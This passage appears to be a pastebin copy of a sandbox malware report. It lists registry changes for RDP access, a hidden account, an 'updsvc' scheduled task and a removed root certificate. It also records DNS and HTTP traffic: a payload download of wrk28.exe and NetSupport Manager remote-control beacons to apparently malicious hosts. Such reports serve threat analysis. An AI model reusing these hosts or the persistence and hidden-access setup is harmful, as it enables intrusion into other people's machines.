  1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xps\\OpenWithProgids\\Windows.XPSReachViewer",
  1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.xsl\\OpenWithProgids\\xslfile",
  1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.zip\\OpenWithProgids\\CompressedFolder",
  1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
  1102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  1103. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
  1104. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
  1105. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  1106. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
  1107. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
  1108. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  1109. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  1110. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  1111. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  1112. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
  1113. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
  1114. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  1115. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  1116. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  1117. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  1118. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  1119. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
  1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  1122. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\BC8BB046-005F-4BA6-90B0-2D92C65A4E13\\Path",
  1123. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\BC8BB046-005F-4BA6-90B0-2D92C65A4E13\\Hash",
  1124. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
  1125. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
  1126. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\BC8BB046-005F-4BA6-90B0-2D92C65A4E13\\Triggers",
  1127. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\BC8BB046-005F-4BA6-90B0-2D92C65A4E13\\DynamicInfo",
  1128. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\3F357760-6247-4A1E-9C1B-F2DC4F9F4249\\Path",
  1129. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\3F357760-6247-4A1E-9C1B-F2DC4F9F4249\\Hash",
  1130. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Id",
  1131. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Index",
  1132. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\3F357760-6247-4A1E-9C1B-F2DC4F9F4249\\Triggers",
  1133. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\3F357760-6247-4A1E-9C1B-F2DC4F9F4249\\DynamicInfo"
  1134.  
  1135.  
  1136. * Deleted Registry Keys:
  1137. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
  1138. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
  1139. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
  1140. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
  1141.  
  1142.  
  1143. * DNS Communications:
  1144.  
  1145. "type": "A",
  1146. "request": "zapor.xyz",
  1147. "answers":
  1148.  
  1149. "data": "94.158.245.123",
  1150. "type": "A"
  1151.  
  1152.  
  1153.  
  1154.  
  1155. "type": "A",
  1156. "request": "iplogger.org",
  1157. "answers":
  1158.  
  1159. "data": "88.99.66.31",
  1160. "type": "A"
  1161.  
  1162.  
  1163.  
  1164.  
  1165. "type": "A",
  1166. "request": "fdguyt5ggs.xyz",
  1167. "answers":
  1168.  
  1169. "data": "94.158.245.123",
  1170. "type": "A"
  1171.  
  1172.  
  1173.  
  1174.  
  1175. "type": "A",
  1176. "request": "apps.identrust.com",
  1177. "answers":
  1178.  
  1179. "data": "192.35.177.64",
  1180. "type": "A"
  1181.  
  1182.  
  1183. "data": "apps.digsigtrust.com",
  1184. "type": "CNAME"
  1185.  
  1186.  
  1187.  
  1188.  
  1189. "type": "A",
  1190. "request": "kuarela.xyz",
  1191. "answers":
  1192.  
  1193. "data": "185.225.17.150",
  1194. "type": "A"
  1195.  
  1196.  
  1197.  
  1198.  
  1199. "type": "A",
  1200. "request": "geo.netsupportsoftware.com",
  1201. "answers":
  1202.  
  1203. "data": "62.172.138.35",
  1204. "type": "A"
  1205.  
  1206.  
  1207. "data": "geograph.netsupportsoftware.com",
  1208. "type": "CNAME"
  1209.  
  1210.  
  1211. "data": "195.171.92.116",
  1212. "type": "A"
  1213.  
  1214.  
  1215.  
  1216.  
  1217.  
  1218. * Domains:
  1219.  
  1220. "ip": "94.158.245.123",
  1221. "domain": "zapor.xyz"
  1222.  
  1223.  
  1224. "ip": "94.158.245.123",
  1225. "domain": "fdguyt5ggs.xyz"
  1226.  
  1227.  
  1228. "ip": "185.225.17.150",
  1229. "domain": "kuarela.xyz"
  1230.  
  1231.  
  1232. "ip": "88.99.66.31",
  1233. "domain": "iplogger.org"
  1234.  
  1235.  
  1236. "ip": "192.35.177.64",
  1237. "domain": "apps.identrust.com"
  1238.  
  1239.  
  1240. "ip": "62.172.138.35",
  1241. "domain": "geo.netsupportsoftware.com"
  1242.  
  1243.  
  1244.  
  1245. * Network Communication - ICMP:
  1246.  
  1247. * Network Communication - HTTP:
  1248.  
  1249. "count": 1,
  1250. "body": "",
  1251. "uri": "http://zapor.xyz/Ywc42gFy1UbOpt3Z/conf.php",
  1252. "user-agent": "",
  1253. "method": "GET",
  1254. "host": "zapor.xyz",
  1255. "version": "1.1",
  1256. "path": "/Ywc42gFy1UbOpt3Z/conf.php",
  1257. "data": "GET /Ywc42gFy1UbOpt3Z/conf.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: zapor.xyz\r\n\r\n",
  1258. "port": 80
  1259.  
  1260.  
  1261. "count": 1,
  1262. "body": "",
  1263. "uri": "http://185.225.17.245/wrk28.exe",
  1264. "user-agent": "",
  1265. "method": "GET",
  1266. "host": "185.225.17.245",
  1267. "version": "1.1",
  1268. "path": "/wrk28.exe",
  1269. "data": "GET /wrk28.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: 185.225.17.245\r\n\r\n",
  1270. "port": 80
  1271.  
  1272.  
  1273. "count": 1,
  1274. "body": "",
  1275. "uri": "http://zapor.xyz/Ywc42gFy1UbOpt3Z/conf.php",
  1276. "user-agent": "",
  1277. "method": "POST",
  1278. "host": "zapor.xyz",
  1279. "version": "1.1",
  1280. "path": "/Ywc42gFy1UbOpt3Z/conf.php",
  1281. "data": "POST /Ywc42gFy1UbOpt3Z/conf.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nHost: zapor.xyz\r\nContent-Length: 152299\r\n\r\n",
  1282. "port": 80
  1283.  
  1284.  
  1285. "count": 1,
  1286. "body": "",
  1287. "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
  1288. "user-agent": "Microsoft-CryptoAPI/6.1",
  1289. "method": "GET",
  1290. "host": "apps.identrust.com",
  1291. "version": "1.1",
  1292. "path": "/roots/dstrootcax3.p7c",
  1293. "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
  1294. "port": 80
  1295.  
  1296.  
  1297. "count": 1,
  1298. "body": "",
  1299. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  1300. "user-agent": "Microsoft-CryptoAPI/6.1",
  1301. "method": "GET",
  1302. "host": "www.download.windowsupdate.com",
  1303. "version": "1.1",
  1304. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  1305. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 89965\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  1306. "port": 80
  1307.  
  1308.  
  1309. "count": 1,
  1310. "body": "",
  1311. "uri": "http://kuarela.xyz/2.txt",
  1312. "user-agent": "Embarcadero URI Client/1.0",
  1313. "method": "GET",
  1314. "host": "kuarela.xyz",
  1315. "version": "1.1",
  1316. "path": "/2.txt",
  1317. "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: kuarela.xyz\r\n\r\n",
  1318. "port": 80
  1319.  
  1320.  
  1321. "count": 1,
  1322. "body": "CMD=POLL\nINFO=1\nACK=1\n",
  1323. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  1324. "user-agent": "NetSupport Manager/1.3",
  1325. "method": "POST",
  1326. "host": "185.225.17.66",
  1327. "version": "1.1",
  1328. "path": "http://185.225.17.66/fakeurl.htm",
  1329. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
  1330. "port": 443
  1331.  
  1332.  
  1333. "count": 1,
  1334. "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3\\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  1335. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  1336. "user-agent": "NetSupport Manager/1.3",
  1337. "method": "POST",
  1338. "host": "185.225.17.66",
  1339. "version": "1.1",
  1340. "path": "http://185.225.17.66/fakeurl.htm",
  1341. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3\\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  1342. "port": 443
  1343.  
  1344.  
  1345. "count": 1,
  1346. "body": "",
  1347. "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
  1348. "user-agent": "",
  1349. "method": "GET",
  1350. "host": "geo.netsupportsoftware.com",
  1351. "version": "1.1",
  1352. "path": "/location/loca.asp",
  1353. "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1354. "port": 80
  1355.  
  1356.  
  1357. "count": 1,
  1358. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  1359. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  1360. "user-agent": "NetSupport Manager/1.3",
  1361. "method": "POST",
  1362. "host": "185.225.17.66",
  1363. "version": "1.1",
  1364. "path": "http://185.225.17.66/fakeurl.htm",
  1365. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 76\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  1366. "port": 443
  1367.  
  1368.  
  1369. "count": 1,
  1370. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  1371. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  1372. "user-agent": "NetSupport Manager/1.3",
  1373. "method": "POST",
  1374. "host": "185.225.17.66",
  1375. "version": "1.1",
  1376. "path": "http://185.225.17.66/fakeurl.htm",
  1377. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  1378. "port": 443
  1379.  
  1380.  
  1381. "count": 4,
  1382. "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  1383. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  1384. "user-agent": "NetSupport Manager/1.3",
  1385. "method": "POST",
  1386. "host": "185.225.17.66",
  1387. "version": "1.1",
  1388. "path": "http://185.225.17.66/fakeurl.htm",
  1389. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  1390. "port": 443
  1391.  
  1392.  
  1393.  
  1394. * Network Communication - SMTP:
  1395.  
  1396. * Network Communication - Hosts:
  1397.  
  1398. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment